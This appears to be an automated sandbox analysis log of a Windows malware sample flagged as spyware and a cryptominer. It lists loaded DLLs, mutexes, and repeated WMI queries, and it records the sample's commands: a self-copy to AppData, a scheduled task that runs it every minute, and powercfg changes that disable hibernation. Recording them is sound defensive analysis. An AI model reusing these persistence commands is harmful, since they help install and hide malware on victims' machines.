              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: powrprof.dll
              Source: C:\Windows\System32\powercfg.exeSection loaded: umpdc.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: capabilityaccessmanager.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: capabilityaccessmanagerclient.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: capauthz.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wifidatacapabilityhandler.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: wwapi.dll
              Source: C:\Windows\System32\svchost.exeSection loaded: cellulardatacapabilityhandler.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: propsys.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: dlnashext.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wpdshext.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: edputil.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: urlmon.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: iertutil.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: srvcli.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: netutils.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: appresolver.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: bcp47langs.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: slc.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: classification engineClassification label: mal100.spyw.evad.mine.winEXE@117/4@2/3
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile created: C:\Users\user\AppData\Roaming\fgfdgdJump to behavior
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6648:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6560:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:692:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:904:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3252:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6688:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6428:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6320:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4124:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6588:120:WilError_03
              Source: C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6580:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6736:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6316:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3232:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5888:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6220:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:488:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7092:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6392:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6624:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6692:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6680:120:WilError_03
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile created: C:\Users\user\AppData\Local\Temp\ghghghg.exeJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\explorer.exe
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\explorer.exeJump to behavior
              Source: ft1i6jvAdD.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Windows\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_process where name="csrss.exe"
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: ft1i6jvAdD.exeReversingLabs: Detection: 55%
              Source: unknownProcess created: C:\Users\user\Desktop\ft1i6jvAdD.exe C:\Users\user\Desktop\ft1i6jvAdD.exe
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Users\user\AppData\Local\Temp\ghghghg.exe "C:\Users\user\AppData\Local\Temp\ghghghg.exe"
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fgfdgd
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe'" /f
              Source: C:\Users\user\Desktop\ft1i6jvAdD.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c copy "C:\Users\user\Desktop\ft1i6jvAdD.exe" "C:\Users\user\AppData\Roaming\fgfdgd\fgfdgd.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Local\Temp\ghghghg.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
